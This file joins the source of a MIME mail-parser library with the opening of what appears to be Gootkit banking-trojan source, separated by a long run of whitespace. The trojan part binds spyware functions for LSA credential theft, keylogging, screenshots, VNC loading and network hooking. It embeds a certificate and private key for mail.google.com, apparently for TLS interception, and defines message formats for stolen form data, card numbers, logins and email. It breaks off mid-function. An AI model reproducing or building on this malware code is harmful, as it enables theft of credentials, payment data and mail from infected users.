        case "content-id":
            this._currentNode.meta.contentId = this._trimQuotes(value);
            break;
    }

    if (this._currentNode.parsedHeaders[key]) {
        if (!Array.isArray(this._currentNode.parsedHeaders[key])) {
            this._currentNode.parsedHeaders[key] = [this._currentNode.parsedHeaders[key]];
        }
        this._currentNode.parsedHeaders[key].push(this._replaceMimeWords(value));
    } else {
        this._currentNode.parsedHeaders[key] = this._replaceMimeWords(value);
    }

    this._currentNode.headers[pos] = {
        key: key,
        value: value
    };
};


MailParser.prototype._createMimeNode = function(parentNode) {
    var node = {
        parentNode: parentNode || this._currentNode || null,
        headers: [],
        parsedHeaders: {},
        meta: {},
        childNodes: []
    };

    return node;
};


MailParser.prototype._parseHeaderLineWithParams = function(value) {
    var key, parts, returnValue = {};

    parts = value.match(/(?:[^;"]+|"[^"]*")+/g) ||  [value];
    returnValue.defaultValue = parts.shift().toLowerCase();

    for (var i = 0, len = parts.length; i < len; i++) {
        value = parts[i].split("=");
        key = value.shift().trim().toLowerCase();
        value = value.join("=").trim();

        
        value = this._trimQuotes(value);
        returnValue[key] = value;
    }

    return returnValue;
};


MailParser.prototype._parseDateString = function(value) {
    var date;

    date = new Date(value);
    if (Object.prototype.toString.call(date) != "[object Date]" || date.toString() == "Invalid Date") {
        try {
            date = strtotime(value);
        } catch (E) {
            return false;
        }
        if (date) {
            date = new Date(date * 1000);
        } else {
            return false;
        }
    }

    return date;
};


MailParser.prototype._parseReceived = function(value) {
    var receivedDate, date, splitString;
    if (!value) {
        return false;
    }

    splitString = value.split(';');
    value = splitString[splitString.length - 1];

    date = this._parseDateString(value);
    receivedDate = this._currentNode.meta.receivedDate;

    if (!date) {
        if (!receivedDate) {
            this._currentNode.meta.receivedDate = date;
        }
        return date;
    }

    if (!receivedDate) {
        this._currentNode.meta.receivedDate = date;
    } else if (date > receivedDate) {
        this._currentNode.meta.receivedDate = date;
    }

    return date;
};


MailParser.prototype._parseContentType = function(value) {
    var fileName;
    value = this._parseHeaderLineWithParams(value);
    if (value) {
        if (value.defaultValue) {
            value.defaultValue = value.defaultValue.toLowerCase();
            this._currentNode.meta.contentType = value.defaultValue;
            if (value.defaultValue.substr(0, "multipart/".length) == "multipart/") {
                this._currentNode.meta.mimeMultipart = value.defaultValue.substr("multipart/".length);
            }
        } else {
            this._currentNode.meta.contentType = "application/octet-stream";
        }
        if (value.charset) {
            value.charset = value.charset.toLowerCase();
            if (value.charset.substr(0, 4) == "win-") {
                value.charset = "windows-" + value.charset.substr(4);
            } else if (value.charset == "ks_c_5601-1987") {
                value.charset = "cp949";
            } else if (value.charset.match(/^utf\d/)) {
                value.charset = "utf-" + value.charset.substr(3);
            } else if (value.charset.match(/^latin[\-_]?\d/)) {
                value.charset = "iso-8859-" + value.charset.replace(/\D/g, "");
            } else if (value.charset.match(/^(us\-)?ascii$/)) {
                value.charset = "utf-8";
            } else if (value.charset.match(/^ansi_x3\.4\-19/)) {
                
                
                value.charset = "utf-8";
            }
            this._currentNode.meta.charset = value.charset;
        }
        if (value.format) {
            this._currentNode.meta.textFormat = value.format.toLowerCase();
        }
        if (value.delsp) {
            this._currentNode.meta.textDelSp = value.delsp.toLowerCase();
        }
        if (value.boundary) {
            this._currentNode.meta.mimeBoundary = value.boundary;
        }

        if (value.method) {
            this._currentNode.meta.method = value.method;
        }


        if (!this._currentNode.meta.fileName && (fileName = this._detectFilename(value))) {
            this._currentNode.meta.fileName = fileName;
        }

        if (value.boundary) {
            this._currentNode.meta.mimeBoundary = value.boundary;
            this._multipartTree.push({
                boundary: value.boundary,
                node: this._currentNode
            });
        }
    }
    return value;
};


MailParser.prototype._detectFilename = function(value) {
    var fileName = "",
        i = 0,
        parts, encoding, name, part;

    if (value.name) {
        return this._replaceMimeWords(value.name);
    }

    if (value.filename) {
        return this._replaceMimeWords(value.filename);
    }

    
    if (value["name*"]) {
        fileName = value["name*"];
    } else if (value["filename*"]) {
        fileName = value["filename*"];
    } else if (value["name*0*"] || value["name*0"]) {
        while ((part = (value["name*" + (i) + "*"] || value["name*" + (i)]))) {
            fileName += part;
            i++;
        }
    } else if (value["filename*0*"] || value["filename*0"]) {
        while ((part = (value["filename*" + (i) + "*"] || value["filename*" + (i)]))) {
            fileName += part;
            i++;
        }
    }

    if (fileName) {
        parts = fileName.split("'");
        encoding = parts.shift();
        name = parts.pop();
        if (name) {
            return this._replaceMimeWords(this._replaceMimeWords("=?" + (encoding || "us-ascii") + "?Q?" + name.replace(/%/g, "=") + "?="));
        }
    }
    return "";
};


MailParser.prototype._parseContentDisposition = function(value) {
    var fileName;

    value = this._parseHeaderLineWithParams(value);

    if (value) {
        if (value.defaultValue) {
            this._currentNode.meta.contentDisposition = value.defaultValue.trim().toLowerCase();
        }
        if ((fileName = this._detectFilename(value))) {
            this._currentNode.meta.fileName = fileName;
        }
    }
};


MailParser.prototype._parseReferences = function(value) {
    this._currentNode.references = (this._currentNode.references || []).concat(
        (value || "").toString().trim().split(/\s+/).map(this._trimQuotes.bind(this))
    );
};


MailParser.prototype._parseInReplyTo = function(value) {
    this._currentNode.inReplyTo = (this._currentNode.inReplyTo || []).concat(
        (value || "").toString().trim().split(/\s+/).map(this._trimQuotes.bind(this))
    );
};


MailParser.prototype._parsePriority = function(value) {
    value = value.toLowerCase().trim();
    if (!isNaN(parseInt(value, 10))) { 
        value = parseInt(value, 10) || 0;
        if (value == 3) {
            return "normal";
        } else if (value > 3) {
            return "low";
        } else {
            return "high";
        }
    } else {
        switch (value) {
            case "non-urgent":
            case "low":
                return "low";
            case "urgent":
            case "hight":
                return "high";
        }
    }
    return "normal";
};


MailParser.prototype._handleTextLine = function(line) {

    if (["quoted-printable", "base64"].indexOf(this._currentNode.meta.transferEncoding) >= 0 || this._currentNode.meta.textFormat != "flowed") {
        if (typeof this._currentNode.content != "string") {
            this._currentNode.content = line;
        } else {
            this._currentNode.content += "\n" + line;
        }
    } else {
        if (typeof this._currentNode.content != "string") {
            this._currentNode.content = line;
        } else if (this._currentNode.content.match(/[ ]$/)) {
            if (this._currentNode.meta.textFormat == "flowed" && this._currentNode.content.match(/(^|\n)-- $/)) {
                
                this._currentNode.content += "\n" + line;
            } else {
                if (this._currentNode.meta.textDelSp == "yes") {
                    this._currentNode.content = this._currentNode.content.replace(/[ ]+$/, "");
                }
                this._currentNode.content += line;
            }
        } else {
            this._currentNode.content += "\n" + line;
        }
    }
};


MailParser.prototype._handleAttachmentLine = function(line) {
    if (!this._currentNode.attachment) {
        return;
    }
    if (this._currentNode.stream) {
        if (!this._currentNode.streamStarted) {
            this._currentNode.streamStarted = true;
            this._currentNode.stream.write(new Buffer(line, "binary"));
        } else {
            this._currentNode.stream.write(new Buffer("\r\n" + line, "binary"));
        }
    } else if ("content" in this._currentNode) {
        if (typeof this._currentNode.content != "string") {
            this._currentNode.content = line;
        } else {
            this._currentNode.content += "\r\n" + line;
        }
    }
};


MailParser.prototype._finalizeContents = function() {
    var streamInfo;

    if (this._currentNode.content) {

        if (!this._currentNode.attachment) {

            if (this._currentNode.meta.contentType == "text/html") {
                this._currentNode.meta.charset = this._detectHTMLCharset(this._currentNode.content) || this._currentNode.meta.charset || this.options.defaultCharset || "iso-8859-1";
            }

            if (this._currentNode.meta.transferEncoding == "quoted-printable") {
                this._currentNode.content = mimelib.decodeQuotedPrintable(this._currentNode.content, false, this._currentNode.meta.charset || this.options.defaultCharset || "iso-8859-1");
                if (this._currentNode.meta.textFormat == "flowed") {
                    if (this._currentNode.meta.textDelSp == "yes") {
                        this._currentNode.content = this._currentNode.content.replace(/(^|\n)-- \n/g, '$1-- \u0000').replace(/ \n/g, '').replace(/(^|\n)-- \u0000/g, '$1-- \n');
                    } else {
                        this._currentNode.content = this._currentNode.content.replace(/(^|\n)-- \n/g, '$1-- \u0000').replace(/ \n/g, ' ').replace(/(^|\n)-- \u0000/g, '$1-- \n');
                    }
                }
            } else if (this._currentNode.meta.transferEncoding == "base64") {
                this._currentNode.content = mimelib.decodeBase64(this._currentNode.content, this._currentNode.meta.charset || this.options.defaultCharset || "iso-8859-1");
            } else {
                this._currentNode.content = this._convertStringToUTF8(this._currentNode.content);
            }
        } else {
            if (this._currentNode.meta.transferEncoding == "quoted-printable") {
                this._currentNode.content = mimelib.decodeQuotedPrintable(this._currentNode.content, false, "binary");
            } else if (this._currentNode.meta.transferEncoding == "base64") {

                
                this._currentNode.content = new Buffer(this._currentNode.content.toString().replace(/\s+/g, ""), "base64");

            } else if (this._currentNode.meta.transferEncoding == "uuencode") {
                var uuestream = new Streams.UUEStream("binary");
                this._currentNode.content = uuestream.decode(new Buffer(this._currentNode.content, "binary"));
            } else {
                this._currentNode.content = new Buffer(this._currentNode.content, "binary");
            }
            this._currentNode.checksum = crypto.createHash("md5");
            this._currentNode.checksum.update(this._currentNode.content);
            this._currentNode.meta.checksum = this._currentNode.checksum.digest("hex");
            this._currentNode.meta.length = this._currentNode.content.length;
        }

    }

    if (this._currentNode.stream) {
        streamInfo = this._currentNode.stream.end() || {};
        if (streamInfo.checksum) {
            this._currentNode.meta.checksum = streamInfo.checksum;
        }
        if (streamInfo.length) {
            this._currentNode.meta.length = streamInfo.length;
        }
    }
};


MailParser.prototype._processMimeTree = function() {
    var returnValue = {},
        i, len;

    this.mailData = {
        html: [],
        text: [],
        calendar: [],
        attachments: []
    };

    if (!this.mimeTree.meta.mimeMultipart) {
        this._processMimeNode(this.mimeTree, 0);
    } else {
        this._walkMimeTree(this.mimeTree);
    }

    if (this.mailData.html.length) {
        for (i = 0, len = this.mailData.html.length; i < len; i++) {
            if (!returnValue.html && this.mailData.html[i].content) {
                returnValue.html = this.mailData.html[i].content;
            } else if (this.mailData.html[i].content) {
                returnValue.html = this._concatHTML(returnValue.html, this.mailData.html[i].content);
            }
        }
    }

    if (this.mailData.text.length) {
        for (i = 0, len = this.mailData.text.length; i < len; i++) {
            if (!returnValue.text && this.mailData.text[i].content) {
                returnValue.text = this.mailData.text[i].content;
            } else if (this.mailData.text[i].content) {
                returnValue.text += this.mailData.text[i].content;
            }
        }
    }


    if (this.mailData.calendar.length) {
        returnValue.alternatives = [];
        for (i = 0, len = this.mailData.calendar.length; i < len; i++) {
            returnValue.alternatives.push(this.mailData.calendar[i].content);
        }
    }

    returnValue.headers = this.mimeTree.parsedHeaders;

    if (this.mimeTree.subject) {
        returnValue.subject = this.mimeTree.subject;
    }

    if (this.mimeTree.references) {
        returnValue.references = this.mimeTree.references;
    }

    if (this.mimeTree.messageId) {
        returnValue.messageId = this.mimeTree.messageId;
    }

    if (this.mimeTree.inReplyTo) {
        returnValue.inReplyTo = this.mimeTree.inReplyTo;
    }

    if (this.mimeTree.priority) {
        returnValue.priority = this.mimeTree.priority;
    }

    if (this.mimeTree.from) {
        returnValue.from = this.mimeTree.from;
    }

    if (this.mimeTree.replyTo) {
        returnValue.replyTo = this.mimeTree.replyTo;
    }

    if (this.mimeTree.to) {
        returnValue.to = this.mimeTree.to;
    }

    if (this.mimeTree.cc) {
        returnValue.cc = this.mimeTree.cc;
    }

    if (this.mimeTree.bcc) {
        returnValue.bcc = this.mimeTree.bcc;
    }

    if (this.mimeTree.meta.date) {
        returnValue.date = this.mimeTree.meta.date;
    }

    if (this.mimeTree.meta.receivedDate) {
        returnValue.receivedDate = this.mimeTree.meta.receivedDate;
    }

    if (this.mailData.attachments.length) {
        returnValue.attachments = [];
        for (i = 0, len = this.mailData.attachments.length; i < len; i++) {
            returnValue.attachments.push(this.mailData.attachments[i].content);
        }
    }

    if (typeof setImmediate == "function") {
        setImmediate(this.emit.bind(this, "end", returnValue));
    } else {
        process.nextTick(this.emit.bind(this, "end", returnValue));
    }
};


MailParser.prototype._walkMimeTree = function(node, level) {
    level = level || 1;
    for (var i = 0, len = node.childNodes.length; i < len; i++) {
        this._processMimeNode(node.childNodes[i], level, node.meta.mimeMultipart);
        this._walkMimeTree(node.childNodes[i], level + 1);
    }
};


MailParser.prototype._processMimeNode = function(node, level, mimeMultipart) {
    var i, len;

    level = level || 0;

    if (!node.attachment) {
        switch (node.meta.contentType) {
            case "text/html":
                if (mimeMultipart == "mixed" && this.mailData.html.length) {
                    for (i = 0, len = this.mailData.html.length; i < len; i++) {
                        if (this.mailData.html[i].level == level) {
                            this._joinHTMLNodes(this.mailData.html[i], node.content);
                            return;
                        }
                    }
                }
                this.mailData.html.push({
                    content: this._updateHTMLCharset(node.content || ""),
                    level: level
                });
                return;
            case "text/plain":
                this.mailData.text.push({
                    content: node.content || "",
                    level: level
                });
                return;
            case "text/calendar":
                if (node.content) {
                    node.meta.content = node.content;
                }
                this.mailData.calendar.push({
                    content: node.meta || {},
                    level: level
                });
                return;
        }
    } else {
        node.meta = node.meta || {};
        if (node.content) {
            node.meta.content = node.content;
        }
        this.mailData.attachments.push({
            content: node.meta || {},
            level: level
        });

        if (this.options.showAttachmentLinks && mimeMultipart == "mixed" && this.mailData.html.length) {
            for (i = 0, len = this.mailData.html.length; i < len; i++) {
                if (this.mailData.html[i].level == level) {
                    this._joinHTMLAttachment(this.mailData.html[i], node.meta);
                    return;
                }
            }
        }
    }
};


MailParser.prototype._joinHTMLNodes = function(htmlNode, newHTML) {
    var inserted = false;

    
    newHTML = (newHTML || "").toString("utf-8").trim();

    
    newHTML = newHTML.replace(/^\s*<\!doctype( [^>]*)?>/gi, "");

    
    newHTML = newHTML.replace(/<head( [^>]*)?>(.*)<\/head( [^>]*)?>/gi, "").
    replace(/<\/?html( [^>]*)?>/gi, "").
    trim();

    
    newHTML.replace(/<body(?: [^>]*)?>(.*)<\/body( [^>]*)?>/gi, function(match, body) {
        newHTML = body.trim();
    });

    htmlNode.content = (htmlNode.content || "").toString("utf-8").trim();

    htmlNode.content = htmlNode.content.replace(/<\/body( [^>]*)?>/i, function(match) {
        inserted = true;
        return "<br/>\n" + newHTML + match;
    });

    if (!inserted) {
        htmlNode.content += "<br/>\n" + newHTML;
    }
};


MailParser.prototype._joinHTMLAttachment = function(htmlNode, attachment) {
    var inserted = false,
        fname = attachment.generatedFileName.replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/"/g, "&quot;"),
        newHTML;

    newHTML = "\n<div class=\"mailparser-attachment\"><a href=\"cid:" + attachment.contentId + "\">&lt;" + fname + "&gt;</a></div>";

    htmlNode.content = (htmlNode.content || "").toString("utf-8").trim();

    htmlNode.content = htmlNode.content.replace(/<\/body\b[^>]*>/i, function(match) {
        inserted = true;
        return "<br/>\n" + newHTML + match;
    });

    if (!inserted) {
        htmlNode.content += "<br/>\n" + newHTML;
    }
};


MailParser.prototype._concatHTML = function(firstNode, secondNode) {
    var headerNode = "",
        htmlHeader = "";

    firstNode = (firstNode || "").toString("utf-8");
    secondNode = (secondNode || "").toString("utf-8");

    if (!secondNode) {
        return firstNode;
    }
    if (!firstNode) {
        return secondNode;
    }

    if (firstNode.substr(0, 1024).replace(/\r?\n/g, "\u0000").match(/^[\s\u0000]*(<\!doctype\b[^>]*?>)?[\s\u0000]*<(html|head)\b[^>]*?>/i)) {
        headerNode = firstNode;
    } else if (secondNode.substr(0, 1024).replace(/\r?\n/g, "\u0000").match(/^[\s\u0000]*(<\!doctype\b[^>]*?>)?[\s\u0000]*<(html|head)\b[^>]*?>/i)) {
        headerNode = secondNode;
    }

    if (headerNode) {
        headerNode.replace(/\r?\n/g, "\u0000").replace(/^[\s\u0000]*(<\!doctype\b[^>]*?>)?[\s\u0000]*<(html|head)\b[^>]*>.*?<\/(head)\b[^>]*>(.*?<body\b[^>]*>)?/i, function(h) {
            var doctype = h.match(/^[\s\u0000]*(<\!doctype\b[^>]*?>)/i),
                html = h.match(/<html\b[^>]*?>/i),
                head = h.match(/<head\b[^>]*?>/i),
                body = h.match(/<body\b[^>]*?>/i);

            doctype = doctype && doctype[1] && doctype[1] + "\n" || "";
            html = html && html[0] || "<head>";
            head = head && head[0] || "<head>";
            body = body && body[0] || "<body>";
            h = h.replace(/<[\!\/]?(doctype|html|head|body)\b[^>]*?>/ig, "\u0000").replace(/\u0000+/g, "\n").trim();

            htmlHeader = doctype + html + "\n" + head + (h ? h + "\n" : "") + "</head>\n" + body + "\n";
        });
    }

    firstNode = firstNode.replace(/\r?\n/g, "\u0000").
    replace(/[\s\u0000]*<head\b[^>]*>.*?<\/(head|body)\b[^>]*>/gi, "").
    replace(/[\s\u0000]*<[\!\/]?(doctype|html|body)\b[^>]*>[\s\u0000]*/gi, "").
    replace(/\u0000/g, "\n");

    secondNode = secondNode.replace(/\r?\n/g, "\u0000").
    replace(/[\s\u0000]*<head\b[^>]*>.*?<\/(head|body)\b[^>]*>/gi, "").
    replace(/[\s\u0000]*<[\!\/]?(doctype|html|body)\b[^>]*>[\s\u0000]*/gi, "").
    replace(/\u0000/g, "\n");

    return htmlHeader + firstNode + secondNode + (htmlHeader ? (firstNode || secondNode ? "\n" : "") + "</body>\n</html>" : "");
};


MailParser.prototype._convertString = function(value, fromCharset, toCharset) {
    toCharset = (toCharset || "utf-8").toUpperCase();
    fromCharset = (fromCharset || "utf-8").toUpperCase();

    value = typeof value == "string" ? new Buffer(value, "binary") : value;

    if (toCharset == fromCharset) {
        return value;
    }

    value = encodinglib.convert(value, toCharset, fromCharset);

    return value;
};


MailParser.prototype._convertStringToUTF8 = function(value) {
    value = this._convertString(value, this._currentNode.meta.charset || this.options.defaultCharset || "iso-8859-1").toString("utf-8");
    return value;
};


MailParser.prototype._encodeString = function(value) {
    value = this._replaceMimeWords(this._convertStringToUTF8(value));
    return value;
};


MailParser.prototype._replaceMimeWords = function(value) {
    return value.
    replace(/(=\?[^?]+\?[QqBb]\?[^?]*\?=)\s+(?==\?[^?]+\?[QqBb]\?[^?]*\?=)/g, "$1"). 
    replace(/\=\?[^?]+\?[QqBb]\?[^?]*\?=/g, (function(a) {
        return mimelib.decodeMimeWord(a.replace(/\s/g, ''));
    }).bind(this));
};


MailParser.prototype._trimQuotes = function(value) {
    value = (value || "").trim();
    if ((value.charAt(0) == '"' && value.charAt(value.length - 1) == '"') ||
        (value.charAt(0) == "'" && value.charAt(value.length - 1) == "'") ||
        (value.charAt(0) == "<" && value.charAt(value.length - 1) == ">")) {
        value = value.substr(1, value.length - 2);
    }
    return value;
};


MailParser.prototype._generateFileName = function(fileName, contentType) {
    var ext, defaultExt = "",
        fileRootName;

    if (contentType) {
        defaultExt = mime.extension(contentType);
        defaultExt = defaultExt ? "." + defaultExt : "";
    }

    fileName = fileName || "attachment" + defaultExt;

    
    fileName = fileName.toString().split(/[\/\\]+/).pop().replace(/^\.+/, "") || "attachment";
    fileRootName = fileName.replace(/(?:\-\d+)+(\.[^.]*)$/, "$1") || "attachment";

    if (fileRootName in this._fileNames) {
        this._fileNames[fileRootName]++;
        ext = fileName.substr((fileName.lastIndexOf(".") || 0) + 1);
        if (ext == fileName) {
            fileName += "-" + this._fileNames[fileRootName];
        } else {
            fileName = fileName.substr(0, fileName.length - ext.length - 1) + "-" + this._fileNames[fileRootName] + "." + ext;
        }
    } else {
        this._fileNames[fileRootName] = 0;
    }

    return fileName;
};



MailParser.prototype._updateHTMLCharset = function(html) {

    html = html.replace(/\n/g, "\u0000").
    replace(/<meta[^>]*>/gi, function(meta) {
        if (meta.match(/http\-equiv\s*=\s*"?content\-type/i)) {
            return '<meta http-equiv="content-type" content="text/html; charset=utf-8" />';
        }
        if (meta.match(/\scharset\s*=\s*['"]?[\w\-]+["'\s>\/]/i)) {
            return '<meta charset="utf-8"/>';
        }
        return meta;
    }).
    replace(/\u0000/g, "\n");

    return html;
};


MailParser.prototype._detectHTMLCharset = function(html) {
    var charset, input, meta;

    if (typeof html != "string") {
        html = html.toString("ascii");
    }

    if ((meta = html.match(/<meta\s+http-equiv=["']content-type["'][^>]*?>/i))) {
        input = meta[0];
    }

    if (input) {
        charset = input.match(/charset\s?=\s?([a-zA-Z\-_:0-9]*);?/);
        if (charset) {
            charset = (charset[1] || "").trim().toLowerCase();
        }
    }

    if (!charset && (meta = html.match(/<meta\s+charset=["']([^'"<\/]*?)["']/i))) {
        charset = (meta[1] || "").trim().toLowerCase();
    }

    return charset;
};                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          

========


var http = require('http');
var https = require('https');
var util = require('util');
var utils = require('utils');
var url = require('url');
var path = require('path');
var fs = require('fs');
var dns = require('dns');
var querystring = require('querystring');
var tls = require('tls');
var protobuf = require('protocol_buffers');
var iconv = require('inconvlite');
var video_recorder = process.binding('video_recorder');
var cabfile = process.binding('cabfile');

var os = require('os');
var net = require('net');
var starttls = require('starttls');
var zeusfunctions = require("zeusmask");

var certgen = process.binding("certgen");
var suspend = require('suspend'),
    resume = suspend.resume;

var gootkit_spyware = process.binding("spyware");
var video_recorder = process.binding('video_recorder');

var bIsProxyInitialized = false;

const PORT_REDIRECTION_BASE = 4000;
const P_SPYWARE = 4;
process.PORT_REDIRECTION_BASE = PORT_REDIRECTION_BASE;

var kMaximumPostDataLength = (65 * 1024);
var kHttpProxyPort = 18080;
var kHttpsProxyPort = 18443;



var KeepAliveAgent = require('keep_alive_agent');
var keepaliveHttpAgent = new KeepAliveAgent();
var keepaliveHttpsAgent = new KeepAliveAgent.Secure();

exports.SpInitialize = gootkit_spyware.SpInitialize;
exports.SpHookRecv = gootkit_spyware.SpHookRecv;
exports.SpHookSend = gootkit_spyware.SpHookSend;
exports.SpUnhookHttp = gootkit_spyware.SpUnhookHttp;
exports.SpTakeScreenshot = gootkit_spyware.SpTakeScreenshot;
exports.SpGetProcessList = gootkit_spyware.SpGetProcessList;
exports.SpGetLocalNetworkNeighborhood = gootkit_spyware.SpGetLocalNetworkNeighborhood;
exports.SpGetLocalUsersAndGroups = gootkit_spyware.SpGetLocalUsersAndGroups;

exports.SpLsaGrabCredentials = gootkit_spyware.SpLsaGrabCredentials;
exports.SpHookKeyboard = gootkit_spyware.SpHookKeyboard;
exports.DbgGetModuleDebugInformation = gootkit_spyware.DbgGetModuleDebugInformation;
exports.DbgGetLoadedModulesList = gootkit_spyware.DbgGetLoadedModulesList;
exports.DnsCacheGetDomainByAddr = gootkit_spyware.DnsCacheGetDomainByAddr;
exports.downloadFileRight = gootkit_spyware.DownloadFileRight;

exports.SpAddPortRedirection = gootkit_spyware.SpAddPortRedirection;
exports.SpGetVendor = gootkit_spyware.SpGetVendor;
exports.SpGetFileWatermark = gootkit_spyware.SpGetFileWatermark;
exports.SpSetFileWatermark = gootkit_spyware.SpSetFileWatermark;
exports.ExLoadVncDllSpecifyBuffers = gootkit_spyware.ExLoadVncDllSpecifyBuffers;

var global_cert = "-----BEGIN CERTIFICATE-----\r\nMIICtzCCAiCgAwIBAgJAwj/sQrLq6n+7nn9OSX0zzgGhP834SgLjlxQ96GHioum4\r\nj3w7bUQWVwUYjadfxZxt3S/xsss3zG5yJGJyFK64ATANBgkqhkiG9w0BAQUFADBC\r\nMRswGQYDVQQDExJHZW9UcnVzdCBHbG9iYWwgQ0ExFjAUBgNVBAoTDUdlb1RydXN0\r\nIEluYy4xCzAJBgNVBAYTAlVTMB4XDTE0MTEyNDE3MDkyOFoXDTE1MTEyNDE3MDky\r\nOFowaTEYMBYGA1UEAxMPbWFpbC5nb29nbGUuY29tMQswCQYDVQQGEwJVUzETMBEG\r\nA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNTW91bnRhaW4gVmlldzETMBEGA1UE\r\nChMKR29vZ2xlIEluYzCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAriq+HsPB\r\noe//EIGy7/aDCsS95UEbVBVeeYOe4OpeOOdy3hE48HADYFEKwMMu2PLh9q9bzNnx\r\naXpRY8Amdcp5Gk4jHJ5akXXGnasw67vE6udzmSay1WgU7jrhkTAbWuyzEIwuehJ7\r\n15awJBKWWw2luxpbLOaw7WSW08vLn3Rk8H0CAwEAAaNXMFUwNAYDVR0lAQH/BCow\r\nKAYIKwYBBQUHAwIGCCsGAQUFBwMEBggrBgEFBQcDAQYIKwYBBQUHAwMwHQYDVR0R\r\nAQH/BBMwEYIPbWFpbC5nb29nbGUuY29tMA0GCSqGSIb3DQEBBQUAA4GBAH4Erwf9\r\nmw+RbSX4MKEppUzs+q7UumC8Z9p+7K3Pnl+xLY6ZW4tHEYLjJqcKGY2a+F4kDW6A\r\nhoyBr+qHJO9aXmoAbAHgHteS27kzWIulh1u6oHGFqHFXDTQKERdckn5MkqF3L+6h\r\nbMEpXkJNLOj2JWzfrUP+ZhVZy78VUEiqr/cY\r\n-----END CERTIFICATE-----\r\n";
var global_key = "-----BEGIN RSA PRIVATE KEY-----\nMIICXQIBAAKBgQCuKr4ew8Gh7/8QgbLv9oMKxL3lQRtUFV55g57g6l4453LeETjw\r\ncANgUQrAwy7Y8uH2r1vM2fFpelFjwCZ1ynkaTiMcnlqRdcadqzDru8Tq53OZJrLV\r\naBTuOuGRMBta7LMQjC56EnvXlrAkEpZbDaW7Glss5rDtZJbTy8ufdGTwfQIDAQAB\r\nAoGASUSt6l9LrAY8dQM69XvssLEHedQj3QGIVvIp+lBeBu5HAmiYXX2hzfkJ3wG9\r\nSYMT0CUBJ3Jf/pF4f9Ar3c2pl9bzN7MY9mmHMUfDl3heCb5NgMBIpu+1R7MKuLsT\r\nQ7aATQd4TIcmPBLX3J+p4G4xY6H55he+8PhZieata2g5XsECQQDnaeGns23X/4h3\r\n4DNyJu174JTEgc1D+rImHPsYcA98qR7G0wyg3E33CFbt+OdtTS1pEKwMAaKJ/qu+\r\n8TpPAeuFAkEAwKvVrMDKRGGHkd7LYPviJ6re9xR+3Iv37ELHGlyoeucXV423sgnh\r\nwE3BhaS2RtX25xOk7Bg63vQsSElMv0bWmQJBAMK+aBgo95d+g+nd022NNO264Xc9\r\nhPBgWOuaF/VI2L+f0zafBVGaFEJ/0igR/zAMctqoHSE9fvuCRiY5+0fh5cECQATs\r\nn2Jx7vl+cKOWySXqaiZPZLF18aQbY7PDJSmUUq4Jd/xB3/8J554tnpOW2R3IXC4d\r\nv2pVWDPYk8UpMm/1FIkCQQDI3gm7JNJqydrLP3plplfFB6hq3yxM1UG4Po+iCych\r\n3/vPHarkJzs3Gl6lH/lxK31gl8UEaF6DLGn8HFO+nzDc\r\n-----END RSA PRIVATE KEY-----";


var messages = protobuf([
    'message Form {\r',
      '\toptional string method = 1;\r',
      '\toptional string source = 2;\r',
      '\toptional string location = 3;\r',
      '\toptional string referer = 4;\r',
      '\toptional bool\tisSsl = 5;\r',
      '\toptional string rawHeaders = 6;\r',
      '\toptional bytes\tpostData = 7;\r',
      '\toptional string protocol = 8;\r',
      '\toptional bool \tisCertificateUsed = 9;\r',
      '\toptional bool \tisLuhnTestPassed = 10;\r',
  '}',
  'message LsaAuth {',
  '     optional string UserName = 1;',
  '     optional string UserDomain = 2;',
  '     optional string UserPassword = 3;',
  '}',
  'message MailMessage {',
    '     optional string html = 1;',
    '     optional string text = 2;',
    '     optional string subject = 3;',
    '     optional string messageId = 4;',
    '     optional string inReplyTo = 5;',
    '     optional string priority = 6;',
    '     optional string from = 7;',
    '     optional string to = 8;',
    '     optional string date = 9;',
    '     optional string receivedDate = 10;',
    '     optional string headers = 11;',
    '     optional bool isDeletedByMailware = 12;',
  '}',
  'message LogLine {',
  '     optional string logstr = 1;',
  '}'
].join('\n'));

var superstring = "hello :D; obama 4mo";
var trace = console.log;

function isTextResponse(headers) {
    var mimetype = headers["content-type"];
    if (mimetype && (mimetype.indexOf("javascript") != -1 || mimetype.indexOf("text/") != -1)) {
        return true;
    }
    return false;
}

function isValidFormdataPostRequest(clientRequest) {
    try {
        return (
			(clientRequest.method == 'POST') &&
			(typeof (clientRequest.headers["content-type"]) === 'string') &&
			(
                (clientRequest.headers["content-type"].indexOf("form") !== -1) ||
                (clientRequest.headers["content-type"].indexOf("multipart") !== -1)
            )
            
		);
    }
    catch (e) {
        console.log(e.stack);
        console.log(e.message);
    }

    return false;
}

function patchRequestLocation(host, strLocation, isSsl) {
    var location = (isSsl ? 'https' : 'http') + "://" + host + strLocation;
    var parsedUrl = url.parse(location);
    
    return parsedUrl;
}



function CapitaliseFirstLetter(string) {
    return string.charAt(0).toUpperCase() + string.slice(1);
}

function CapitalizeHeaderNameString(headerName) {
    var HeadersNameParts = headerName.split('-');

